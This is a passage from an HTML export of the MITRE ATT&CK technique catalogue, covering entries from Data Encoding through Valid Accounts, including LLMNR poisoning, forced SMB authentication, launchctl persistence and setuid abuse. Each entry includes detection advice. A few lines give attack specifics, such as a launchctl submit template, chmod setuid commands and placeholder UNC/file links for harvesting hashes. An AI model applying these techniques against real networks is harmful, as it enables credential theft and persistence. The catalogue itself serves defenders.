<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_encoding_t1132"><a class="anchor" href="#_data_encoding_t1132"></a><a class="link" href="#_data_encoding_t1132">Data Encoding - T1132</a></h3>
<div class="paragraph">
<p>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Process use of network, Process Monitoring, Network protocol analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 819. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1132">https://attack.mitre.org/wiki/Technique/T1132</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Binary-to-text%20encoding">https://en.wikipedia.org/wiki/Binary-to-text%20encoding</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Character%20encoding">https://en.wikipedia.org/wiki/Character%20encoding</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_llmnr_nbt_ns_poisoning_t1171"><a class="anchor" href="#_llmnr_nbt_ns_poisoning_t1171"></a><a class="link" href="#_llmnr_nbt_ns_poisoning_t1171">LLMNR/NBT-NS Poisoning - T1171</a></h3>
<div class="paragraph">
<p>Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)</p>
</div>
<div class="paragraph">
<p>Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.</p>
</div>
<div class="paragraph">
<p>Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder. (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)</p>
</div>
<div class="paragraph">
<p>Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.</p>
</div>
<div class="paragraph">
<p>Deploy an LLMNR/NBT-NS spoofing detection tool. (Citation: GitHub Conveigh)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Packet capture, Netflow/Enclave netflow</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Matthew Demaske, Adaptforward</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 820. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1171">https://attack.mitre.org/wiki/Technique/T1171</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Link-Local%20Multicast%20Name%20Resolution">https://en.wikipedia.org/wiki/Link-Local%20Multicast%20Name%20Resolution</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/cc958811.aspx">https://technet.microsoft.com/library/cc958811.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/nomex/nbnspoof">https://github.com/nomex/nbnspoof</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr%20response">https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr%20response</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/SpiderLabs/Responder">https://github.com/SpiderLabs/Responder</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning">https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/Kevin-Robertson/Conveigh">https://github.com/Kevin-Robertson/Conveigh</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_credentials_in_files_t1081"><a class="anchor" href="#_credentials_in_files_t1081"></a><a class="link" href="#_credentials_in_files_t1081">Credentials in Files - T1081</a></h3>
<div class="paragraph">
<p>Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.</p>
</div>
<div class="paragraph">
<p>It is possible to extract passwords from backups or saved virtual machines through Credential Dumping. (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)</p>
</div>
<div class="paragraph">
<p>Detection: While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See Valid Accounts for more information.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Access to files</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 821. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1081">https://attack.mitre.org/wiki/Technique/T1081</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html">http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx">http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powershell_t1086"><a class="anchor" href="#_powershell_t1086"></a><a class="link" href="#_powershell_t1086">PowerShell - T1086</a></h3>
<div class="paragraph">
<p>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.</p>
</div>
<div class="paragraph">
<p>PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.</p>
</div>
<div class="paragraph">
<p>Administrator permissions are required to use PowerShell to connect to remote systems.</p>
</div>
<div class="paragraph">
<p>A number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)</p>
</div>
<div class="paragraph">
<p>Detection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.</p>
</div>
<div class="paragraph">
<p>It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 822. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1086">https://attack.mitre.org/wiki/Technique/T1086</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx">https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/PowerShellEmpire/Empire">https://github.com/PowerShellEmpire/Empire</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/jaredhaight/PSAttack">https://github.com/jaredhaight/PSAttack</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf">http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/02/greater%20visibilityt.html">https://www.fireeye.com/blog/threat-research/2016/02/greater%20visibilityt.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_security_software_discovery_t1063"><a class="anchor" href="#_security_software_discovery_t1063"></a><a class="link" href="#_security_software_discovery_t1063">Security Software Discovery - T1063</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example commands that can be used to obtain security software information are netsh, &lt;code&gt;reg query&lt;/code&gt; with Reg, &lt;code&gt;dir&lt;/code&gt; with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>It&#8217;s becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 823. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1063">https://attack.mitre.org/wiki/Technique/T1063</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_launchctl_t1152"><a class="anchor" href="#_launchctl_t1152"></a><a class="link" href="#_launchctl_t1152">Launchctl - T1152</a></h3>
<div class="paragraph">
<p>Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt;&#8201;&#8212;&#8201;/Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.</p>
</div>
<div class="paragraph">
<p>Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</p>
</div>
<div class="paragraph">
<p>Detection: Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Application whitelisting, Process whitelisting, Whitelisting by file name or path</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 824. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1152">https://attack.mitre.org/wiki/Technique/T1152</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_existing_service_t1031"><a class="anchor" href="#_modify_existing_service_t1031"></a><a class="link" href="#_modify_existing_service_t1031">Modify Existing Service - T1031</a></h3>
<div class="paragraph">
<p>Windows service configuration information, including the file path to the service&#8217;s executable, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.</p>
</div>
<div class="paragraph">
<p>Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.</p>
</div>
<div class="paragraph">
<p>Detection: Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. (Citation: TechNet Autoruns)</p>
</div>
<div class="paragraph">
<p>Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute cmd commands or scripts.</p>
</div>
<div class="paragraph">
<p>Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 825. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1031">https://attack.mitre.org/wiki/Technique/T1031</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_standard_cryptographic_protocol_t1032">Standard Cryptographic Protocol - T1032</a></h3>
<div class="paragraph">
<p>Adversaries use command and control over an encrypted channel using a known encryption protocol like HTTPS or SSL/TLS. The use of strong encryption makes it difficult for defenders to detect signatures within adversary command and control traffic.</p>
</div>
<div class="paragraph">
<p>Some adversaries may use other encryption protocols and algorithms with symmetric keys, such as RC4, that rely on encryption keys encoded into malware configuration files and not public key cryptography. Such keys may be obtained through malware reverse engineering.</p>
</div>
<div class="paragraph">
<p>Detection: SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks)</p>
</div>
<div class="paragraph">
<p>If malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)</p>
</div>
<div class="paragraph">
<p>In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Malware reverse engineering, Process use of network, Process monitoring, SSL/TLS inspection</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 826. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1032">https://attack.mitre.org/wiki/Technique/T1032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840">http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html">https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf">https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_setuid_and_setgid_t1166"><a class="anchor" href="#_setuid_and_setgid_t1166"></a><a class="link" href="#_setuid_and_setgid_t1166">Setuid and Setgid - T1166</a></h3>
<div class="paragraph">
<p>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively. Normally an application is run in the current users context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesnt need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file&#8217;s attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different users context.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, root</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 827. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1166">https://attack.mitre.org/wiki/Technique/T1166</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_forced_authentication_t1187"><a class="anchor" href="#_forced_authentication_t1187"></a><a class="link" href="#_forced_authentication_t1187">Forced Authentication - T1187</a></h3>
<div class="paragraph">
<p>The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. Web Distributed Authoring and Versioning (WebDAV) is typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)</p>
</div>
<div class="paragraph">
<p>Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary, or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user&#8217;s system accesses the untrusted resource it will attempt authentication and send information including the user&#8217;s hashed credentials over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials, or reuse it for Pass the Hash. (Citation: Cylance Redirect to SMB)</p>
</div>
<div class="paragraph">
<p>There are different ways this can occur:
*A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened. The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
*A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause.</p>
</div>
<div class="paragraph">
<p>Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Network protocol analysis, Network device logs, Process use of network</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Teodor Cimpoesu</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 828. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1187">https://attack.mitre.org/wiki/Technique/T1187</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Server%20Message%20Block">https://en.wikipedia.org/wiki/Server%20Message%20Block</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/">https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx">https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hob0/hashjacking">https://github.com/hob0/hashjacking</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pdfs/white%20papers/RedirectToSMB.pdf">https://www.cylance.com/content/dam/cylance/pdfs/white%20papers/RedirectToSMB.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-293A">https://www.us-cert.gov/ncas/alerts/TA17-293A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_valid_accounts_t1078"><a class="anchor" href="#_valid_accounts_t1078"></a><a class="link" href="#_valid_accounts_t1078">Valid Accounts - T1078</a></h3>
<div class="paragraph">
<p>Adversaries may steal the credentials of a specific user or service account using Credential Access techniques. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network and may even be used for persistent access to remote systems. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.</p>
</div>
<div class="paragraph">
<p>Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful.</p>
</div>
<div class="paragraph">
<p>The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)</p>
</div>
<div class="paragraph">
